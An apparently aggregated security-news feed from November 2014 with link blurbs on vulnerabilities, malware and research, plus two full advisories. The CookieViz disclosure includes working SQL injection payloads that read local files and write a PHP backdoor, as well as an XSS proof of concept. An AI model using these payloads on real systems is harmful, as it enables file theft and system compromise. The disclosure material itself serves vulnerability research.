Quantcast
Channel: BOT24
Viewing all 8064 articles
Browse latest View live

Paper: Exploiting CVE-2014-4113 on Windows 8.1

November 1, 2014, 4:26 am
$
0
0
On the 14th of October 2014 both CrowdStrike1 and FireEye2 published a blog post describing a new zero-day privilege escalation vulnerability on Windows. The CrowdStrike article explains that this new vulnerability was identified in the process of tracking a supposedly highly advanced adversary group named HURRICANE PANDA and has been actively exploited in the wild for at least five month.

The vulnerability was apparently found and reported to Microsoft by both CrowdStrike and FireEye.
It was subsequently fixed by Microsoft in MS14-058. Shortly after, the binaries described in the blog
posts were found in the wild3. At the time of this writing there are several good analysis4 of the
exploit based on those binaries as well as a working Metasploit module which supports all current
32-bit and 64-bit versions of Windows with the exception of Windows 8 and Windows 8.1

more here............http://www.jodeit.org/research/Exploiting_CVE-2014-4113_on_Windows_8.1.pdf
Search

Message Security Layer: A Modern Take on Securing Communication

November 1, 2014, 4:27 am
$
0
0
Netflix serves audio and video to millions of devices and subscribers across the globe. Each device has its own unique hardware and software, and differing security properties and capabilities. The communication between these devices and our servers must be secured to protect both our subscribers and our service.
When we first launched the Netflix streaming service we used a combination of HTTPS and a homegrown security mechanism called NTBA to provide that security. However, over time this combination started exhibiting growing pains. With the advent of HTML5 and the Media Source Extensions and Encrypted Media Extensions we needed something new that would be compatible with that platform. We took this as an opportunity to address many of the shortcomings of the earlier technology. The Message Security Layer (MSL) was born from these dual concerns.

more here.......http://techblog.netflix.com/2014/10/message-security-layer-modern-take-on.html

PS Vita Level 1: Webkitties

November 1, 2014, 4:28 am
$
0
0
A few weeks ago, a couple of friends and I decided to take a look at the PS Vita in order to see if we could exploit it in any way. Since I didn't really have an idea where to start, I did some research in order to get some information about the Vita.

more here...........http://acez.re/ps-vita-level-1-webkitties-3/

Paper: How Secure is TextSecure?

November 1, 2014, 6:39 am
$
0
0
 Instant Messaging has attracted a lot of attention by users for both private and business communication and has especially gained popularity as low-cost short message replacement on mobile devices. However, most popular mobile messaging apps do not provide end-to-end security. Press releases about mass surveillance performed by intelligence services such as NSA and GCHQ lead many people looking for means that allow them to preserve the security and privacy of their communication on the Internet. Additionally fueled by Facebook's acquisition of the hugely popular messaging app WhatsApp, alternatives that claim to provide secure communication experienced a significant increase of new users.

A messaging app that has attracted a lot of attention lately is TextSecure, an app that claims to provide secure instant messaging and has a large number of installations via Google's Play Store. It's protocol is part of Android's most popular aftermarket firmware CyanogenMod. In this paper, we present the first complete description of TextSecure's complex cryptographic protocol and are the first to provide a thorough security analysis of TextSecure. Among other findings, we present an Unknown Key-Share Attack on the protocol, along with a mitigation strategy, which has been acknowledged by TextSecure's developers. Furthermore, we formally prove that---if our mitigation is applied---TextSecure's push messaging can indeed achieve the goals of authenticity and confidentiality.

more here.........https://eprint.iacr.org/2014/904.pdf

Reversing D-Link’s WPS Pin Algorithm

November 1, 2014, 4:50 pm
$
0
0
While perusing the latest firmware for D-Link’s DIR-810L 80211ac router, I found an interesting bit of code in sbin/ncc, a binary which provides back-end services used by many other processes on the device, including the HTTP and UPnP servers

more here..........http://www.devttys0.com/2014/10/reversing-d-links-wps-pin-algorithm/

MS Bitlocker device encryption automatically uploads recovery keys to SkyDrive

November 2, 2014, 8:29 am
$
0
0
A sends:

1) Bitlocker keys are uploaded to OneDrive by 'device encryption'.

"Unlike a standard BitLocker implementation, device encryption is enabled automatically so that the device is always protected.

...

If the device is not domain-joined a Microsoft Account that has been granted administrative privileges on the device is required. When the administrator uses a Microsoft account to sign in, the clear key is removed, a recovery key is uploaded to online Microsoft account and TPM protector is created."

more here...........http://cryptome.org/2014/11/ms-onedrive-nsa-prism.htm

Password hash disclosure in Linksys Smart WiFi routers

November 2, 2014, 4:11 pm
$
0
0
This is my tale about reporting a specific security vulnerability in a major product, just to give some insight in how responsible disclosures are handled by a security researcher (me) and various software companies (Cisco, Linksys and Belkin).

more here.........http://sijmen.ruwhof.net/weblog/268-password-hash-disclosure-in-linksys-smart-wifi-routers

[BugBounty] The 5000$ Google XSS

November 2, 2014, 4:59 pm
$
0
0
Dear followers,
i recently searched for vulnerabilities on a Google service called tagmanager, this service is used for SEO operations.

more here..........http://blog.it-securityguard.com/bugbounty-the-5000-google-xss/
Search

Can We Rely on an Air-Gap to Secure our Critical Systems?

November 2, 2014, 5:06 pm
$
0
0
Following our recent disclosure on how to breach air gap security with a simple mobile phone and RF emitted from the air-gapped computer we wanted to provide some overview on the topic. - See more at: http://cyber.bgu.ac.il/blog/can-we-rely-air-gap-secure-our-critical-systems#sthash.XXzMC6hz.dpuf

Possible leaked credentials from United Nation Development Program

November 3, 2014, 3:00 am
$
0
0
Possible leaked credentials from United Nation Development Program here....http://siph0n.in/exploits.php?id=3576

burpstaticscan

November 3, 2014, 3:02 am
$
0
0
Use burp's JS static code analysis on code from your local system. Here's generally how the process works:

Go static file server is started to host the specified directory
Add file server URL to burp's scope
Walk the directory
For every file make a request to the file server
Send the raw request and response to burp's passive scanner through burpbuddy
Issues can be seen in burp

more here..........https://github.com/tomsteele/burpstaticscan

For Those Who Missed This News: Commission updates EU control list on dual use items

November 3, 2014, 3:06 am
$
0
0
The Commission has updated the EU list of dual-use items – goods, software and technology normally used for civilian purposes but which might have military applications or contribute to the proliferation of weapons of mass destruction.

more here.........http://trade.ec.europa.eu/doclib/press/index.cfm?id=1166

Hacking Android phone using Metasploit

November 3, 2014, 3:08 am
$
0
0
World is contracting with the growth of mobile phone technology. As the number of users is increasing day by day, facilities and the statistics are changing likewise. The mobile phones are providing ease and comfort in connecting to the people around us and enable us to share our conversation. But at the same time security threats are also increasing with the growth of the mobile users. With the term of security, users need to be aware of the attacks and security measures those are required to be carried out. The most used platform in mobile phones is android which is very popular among other available platforms. Android has become the operating system of choice for users who value innovation so with this article I am going to show how to hack the mobile phone on android platform by using Metasploit.

more here...........http://infosecaffairs.blogspot.in/2014/11/hacking-android-phone-using-metasploit.html

Over 227,000 New Malware Samples Emerged Daily in Q3 2014

November 3, 2014, 3:10 am
$
0
0
Cybercriminals have taken the fast lane to thieving and plundering, creating more than 20 million fresh strains of malware in the third quarter of the year, which translates into a rate of 227,747 new samples per day.

more here...........http://news.softpedia.com/news/Over-227-000-New-Malware-Ssamples-Emerged-Daily-In-Q3-2014-463771.shtml

CVE-2014-5387 - Multiple Authenticated SQL Injections in EllisLab ExpressionEngine Core

November 3, 2014, 3:12 am
$
0
0
Vulnerability title: Multiple Authenticated SQL Injections in EllisLab ExpressionEngine Core
CVE: CVE-2014-5387
Vendor: EllisLab
Product: ExpressionEngine Core
Affected version: Versions earlier than 2.9.0 Fixed version: 2.9.1 Reported by: Jerzy Kramarz and Alex Murillo Moya

Details:

SQL injection has been found and confirmed within the software as an authenticated user. A successful attack could allow an authenticated attacker to access information such as usernames and password hashes that are stored in the database.

The following URLs and parameters have been confirmed to suffer from Multiple SQL injections:

Vulnerability 1

POST
/ex/system/index.php?S=d80babaf271e481ba9a8fde69dd72b28&D=cp&C=addons_modules&M=show_module_cp&module=comment
HTTP/1.1
Host: 192.168.56.103
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101
Firefox/31.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-CSRF-TOKEN: e5806ae56ad19f2124a4a22e517b00dfd47d2c32
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer:
http://192.168.56.103/ex/system/index.php?/cp/addons_modules/show_module_cp&module=comment&S=d80babaf271e481ba9a8fde69dd72b28
Content-Length: 243
Cookie: [...]
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

tbl_sort%5B0%5D%5B%5D=comment_date<SQL
Injection>&tbl_sort%5B0%5D%5B%5D=asc&csrf_token=e5806ae56ad19f2124a4a22e
Injection>517b00dfd47d2c32&keywords=&XID=e5806ae56ad19f2124a4a22e517b00d
Injection>fd47d2c32


Vulnerability 2

POST
/ExpressEngine/system/index.php?S=5711f695056db582aa7427787f525d6f&D=cp&C=members&M=view_all_members
HTTP/1.1
Host: 192.168.56.103
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101
Firefox/31.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-CSRF-TOKEN: e5806ae56ad19f2124a4a22e517b00dfd47d2c32
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: [...]
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

csrf_token=ee4[...]&member_name=1&column_filter=all<SQL
Injection>&XID=ee4[...]


Vulnerability 3

POST
/ExpressEngine/system/index.php?/cp/content_publish/entry_form&channel_id=2&entry_id=3&filter=YToxOntzOjEwOiJjaGFubmVsX2lkIjtzOjE6IjIiO30%3D&S=5711f695056db582aa7427787f525d6f
HTTP/1.1
Host: 192.168.56.103
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101
Firefox/31.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer:
http://192.168.56.103/ExpressEngine/system/index.php?/cp/content_publish/entry_form&channel_id=2&entry_id=3&filter=YToxOntzOjEwOiJjaGFubmVsX2lkIjtzOjE6IjIiO30=&S=5711f695056db582aa7427787f525d6f
Cookie: [...]
Connection: keep-alive
Content-Type: multipart/form-data;
boundary=---------------------------317032379522964
Content-Length: 4607

-----------------------------317032379522964
Content-Disposition: form-data; name="entry_id"

3
-----------------------------317032379522964
Content-Disposition: form-data; name="channel_id"

2
-----------------------------317032379522964
Content-Disposition: form-data; name="autosave_entry_id"

0
-----------------------------317032379522964
Content-Disposition: form-data; name="filter"

YToxOntzOjEwOiJjaGFubmVsX2lkIjtzOjE6IjIiO30=
-----------------------------317032379522964
Content-Disposition: form-data; name="csrf_token"

468a1cb7f860c43937e82527bb0c2dd0fea381e6
-----------------------------317032379522964
Content-Disposition: form-data; name="member_group[]"

1
-----------------------------317032379522964
Content-Disposition: form-data; name="layout_preview"

1
-----------------------------317032379522964
Content-Disposition: form-data; name="title"

About the Label
-----------------------------317032379522964
Content-Disposition: form-data; name="url_title"

about_the_label
-----------------------------317032379522964
Content-Disposition: form-data; name="field_id_4"

text

-----------------------------317032379522964
Content-Disposition: form-data; name="field_ft_4"

xhtml
-----------------------------317032379522964
Content-Disposition: form-data; name="field_id_5_hidden_file"

map2.jpg
-----------------------------317032379522964
Content-Disposition: form-data; name="field_id_5_hidden_dir"

2
-----------------------------317032379522964
Content-Disposition: form-data; name="field_id_5"; filename=""
Content-Type: application/octet-stream

-----------------------------317032379522964
Content-Disposition: form-data; name="field_id_5_directory"

2
-----------------------------317032379522964
Content-Disposition: form-data; name="field_id_6"

-----------------------------317032379522964
Content-Disposition: form-data; name="field_id_7"

1
-----------------------------317032379522964
Content-Disposition: form-data; name="field_ft_7"

xhtml
-----------------------------317032379522964
Content-Disposition: form-data; name="entry_date"

8/13/14 2:02 PM
-----------------------------317032379522964
Content-Disposition: form-data; name="expiration_date"

-----------------------------317032379522964
Content-Disposition: form-data; name="comment_expiration_date"

-----------------------------317032379522964
Content-Disposition: form-data; name="category[]"

4<SQL Injection>
-----------------------------317032379522964
Content-Disposition: form-data; name="category[]"

3<SQL Injection>
-----------------------------317032379522964
Content-Disposition: form-data; name="new_channel"

2
-----------------------------317032379522964
Content-Disposition: form-data; name="status"

open
-----------------------------317032379522964
Content-Disposition: form-data; name="author"

1
-----------------------------317032379522964
Content-Disposition: form-data; name="sticky"

y
-----------------------------317032379522964
Content-Disposition: form-data; name="allow_comments"

y
-----------------------------317032379522964
Content-Disposition: form-data; name="pages__pages_uri"

/asd
-----------------------------317032379522964
Content-Disposition: form-data; name="pages__pages_template_id"

4
-----------------------------317032379522964
Content-Disposition: form-data; name="submit"

Submit
-----------------------------317032379522964--



Further details at:

https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-5387/

Copyright:
Copyright (c) Portcullis Computer Security Limited 2014, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited.

Disclaimer:
The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the author/distributor (Portcullis Computer Security
Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.



###############################################################
This email originates from the systems of Portcullis
Computer Security Limited, a Private limited company,
registered in England in accordance with the Companies
Act under number 02763799. The registered office
address of Portcullis Computer Security Limited is:
Portcullis House, 2 Century Court, Tolpits Lane, Watford,
United Kingdom, WD18 9RS.
The information in this email is confidential and may be
legally privileged. It is intended solely for the addressee.
Any opinions expressed are those of the individual and
do not represent the opinion of the organisation. Access
to this email by persons other than the intended recipient
is strictly prohibited.
If you are not the intended recipient, any disclosure,
copying, distribution or other action taken or omitted to be
taken in reliance on it, is prohibited and may be unlawful.
When addressed to our clients any opinions or advice
contained in this email is subject to the terms and
conditions expressed in the applicable Portcullis Computer
Security Limited terms of business.
###############################################################

#####################################################################################
This e-mail message has been scanned for Viruses and Content and cleared
by MailMarshal.
#####################################################################################
Search

Drupal 7.32 two weeks later - PoC

November 3, 2014, 9:52 am
$
0
0
Automated attacks began compromising Drupal 7 websites that were not patched or updated to Drupal 7.32 within hours of the announcement of SA-CORE-2014-005 - Drupal core - SQL injection. You should proceed under the assumption that every Drupal 7 website was compromised unless updated or patched before Oct 15th, 11pm UTC, that is 7 hours after the announcement.
Drupal Security Team

With this in mind we release more information about the bug including a code execution PoC, which takes only one GET request with a cookie that will not be shown in any log.

more here..........https://www.sektioneins.de/en/blog/14-11-03-drupal-sql-injection-vulnerability-PoC.html

Report: A Flaw In Visa's Contactless Card Lets Anyone Charge It $999,999

November 3, 2014, 9:53 am
$
0
0
Contactless credit cards are a hit in the UK. But a British research team has revealed a serious security flaw that allows anyone to charge up to $999,999.99 in foreign currency to a nearby card, even while it's still in a wallet or purse.

more here..........http://gizmodo.com/report-a-flaw-in-visas-contactless-card-lets-anyone-ch-1653974432

AntiVirus-evading Executable and Post-Exploitation with the Veil-Evasion Framework and Metasploit

November 3, 2014, 11:18 am
$
0
0
In this post, i’m covering the creation of a shell_reverse_tcp payload-ed executable that will evade all antivirus software, and some post-exploitation stuff using the Veil-Evasion Framework and Metasploit.

more here..........http://cultofthedyingsun.wordpress.com/2014/11/01/antivirus-evading-executable-and-post-exploitation-with-the-veil-evasion-framework-and-metasploit/

CNIL CookieViz XSS + SQL injection leading to user pwnage

November 3, 2014, 4:12 pm
$
0
0
# CNIL CookieViz XSS + SQL injection leading to user pwnage
#
# Product link:         https://github.com/LaboCNIL/CookieViz
# CVE references        CVE-2014-8351, CVE-2014-8352

TL;DR
-----
Since October 2014, the French National Commission on Informatics and Liberty "CNIL" is performing some controls upon "tracing cookies" (ads, webaudience etc.) set by French websites:  http://www.cnil.fr/linstitution/actualite/article/article/cookies-des-controles-a-partir-doctobre/
In order for private individuals to know what cookies are upon browsing teh interwebz, CNIL "experts" generously released the "CookieViz" tool, which is compatible with most of modern Operating Systems (Windows, Linux, OS X):
http://www.cnil.fr/vos-droits/vos-traces/les-cookies/telechargez-cookieviz/
https://github.com/LaboCNIL/CookieViz

Anyone can thus use this tool to check potential tracing infringements.
While this intention is definitely laudable, the produced code is dreadful and riddled with ridiculous security vulnerabilities: XSS, SQL injections and security misconfigurations which can lead to a data leakage of the user's files and potentially a compromise by pushing malicious files on his system.

For an organism fighting for citizens' data privacy...exposing them to security troubles is the height of irony.


PoC
---
CookieViz is based on 2 components:
- A cookie harvester, which is basically a grep on tshark with http filters on;
- A cookie visualizer, which is a more or less fancy HTML GUI relying on d3js.

The 2 components are:
- Packaged in a standalone WAMP environment for Windows: both components are notably using the root MySQL account with all privileges (hello FILE), PHP magic quotes are off and so on...
- Unpackaged for Linux and Mac OS environments: you have to integrate them in your own (L|M)AMP. In this case, vuln impacts rely only on you and your setup.

The following PoC only focuses on Windows.
The scenario is:
0. You install the standalone package;
1. You visit a Website in order to check for its cookies. This website includes malicious resources, like in an iframe, which can for instance:
   1.a) read arbitrary local files;
   1.b) write any content to non-existing files: you would directly execute arbitrary code on the victim's system but interesting PHP functions like shell_exec(), exec(), passthru() etc. are explicitly disabled in the php.ini
2. You get pwned as the malicious resources are locally executed


SQLi injection: CVE-2014-8351
-----------------
On your malicious website, create an HTML file containing one of these payloads:

1.a)
<!DOCTYPE html>
<html>
<body>
<p>Reading arbitrary local file - C:\CookieViz\conf\php.ini :</p>
 <iframe src="http://localhost:81/cookie_viz/info.php?domain=*' union all select @@version,2,3,4,5,6,1,load_file('C:\\CookieViz\\conf\\php.ini'),9 -- /**">
 </iframe>
</body>
</html>


1.b) Inb4 : '<?PHP echo "Im pwned " ?>'  is converted to a string with MySQL CHAR() function
<!DOCTYPE html>
<html>
<body>
<p>Inserting arbitrary PHP code in C:\CookieViz\www\backdoor.php :</p>
 <iframe src="http://localhost:81/cookie_viz/info.php?domain=*' union all select @@version,2,3,4,5,6,7,CHAR(39, 60, 63, 80, 72, 80, 32, 101, 99, 104, 111, 32, 34, 73, 109, 32, 112, 119, 110, 101, 100, 32, 34, 32, 63, 62, 39),9 INTO outfile 'C:\\CookieViz\\www\\backdoor.php' -- /**">
 </iframe>
</body>
</html>

2) Visit your HTML page with the standalone package browser.
3) Profit.


XSS: CVE-2014-8352
-----
http://localhost/cookieviz/json.php?max_date="><script>alert(1)</script>


Vuln details
-------
SQLi injections:
-----------------
info.php, line 21:

        if(isset($_GET["domain"]))
        {
                $domain = $_GET["domain"];
        }
        [...]
        $query="SELECT * FROM url_referer WHERE referer_domains='".$domain."'GROUP BY url_domains, referer_domains";
        $result = mysql_query($query) or die ("Echec de la requête : ".$query." ". mysql_error());
        while ($line = mysql_fetch_assoc($result))
        {
                echo "<tr>";
                if ($line["is_cookie"] == 1)
                {
                        echo "<td>".$line["referer_domains"];
                        echo "<td>".$line["url_domains"];
                        echo "<td>".$line["cookie"];
                }
                echo "</tr>";
        }


XSS:
-----
json.php, line 253:

        print '{"inf_nodes":'.$write_nodes.',"inf_links":'.$write_links.',"max_date":"'.$max_date.'","cpt":'.$cpt.'}';

Solution
--------
- Slutshame CNIL
- Wait for patches


Timeline
--------
Oct 16, 2014: Getting to know that CNIL released a tool. Visiting the project page and laughing a bit
Oct 17, 2014: Requiring CVE, just for trolling purposes
Nov 03, 2014: Going fulldisclo, still for trolling purposes

ROM – A New Version of the Backoff PoS Malware

November 3, 2014, 5:29 pm
$
0
0
A few months have passed since the release of the “Backoff” point-of-sale (PoS) malware advisory, but Backoff and other PoS malware continue to be an active threat as businesses keep reporting data breaches and the compromise of their customers’ financial information.

We have recently encountered a new version of the Backoff malware family, which we are detecting as W32/Backoff.B!tr.spy. Unlike previous versions, this one no longer uses a version number in the malware body, but just uses the version name ROM. ROM performs very similarly to Backoff’s previous versions, but modifications have been made to make analysis more difficult and to avoid detection.

more here..........http://blog.fortinet.com/post/rom-a-new-version-of-the-backoff-pos-malware
Viewing all 8064 articles
Browse latest View live
Search